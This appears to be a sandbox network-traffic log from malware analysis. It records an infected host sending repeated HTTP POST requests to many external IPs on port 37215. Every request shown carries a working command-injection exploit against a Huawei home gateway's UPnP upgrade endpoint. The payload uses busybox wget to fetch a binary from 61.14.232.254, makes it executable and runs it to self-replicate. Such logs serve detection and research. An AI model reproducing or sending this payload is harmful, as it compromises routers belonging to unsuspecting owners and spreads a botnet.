                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  298192.168.2.1351348157.141.107.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227551937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  299192.168.2.1335414157.151.164.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227572918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  300192.168.2.1354882157.55.110.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227593899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  301192.168.2.1348484197.23.172.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227617979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  302192.168.2.133446841.76.109.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227642059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  303192.168.2.1344146157.19.151.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227659941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  304192.168.2.133921217.56.114.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227679968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  305192.168.2.1359990157.162.71.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227700949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  306192.168.2.136071641.58.213.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227722883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  307192.168.2.1342462210.223.34.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227739096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 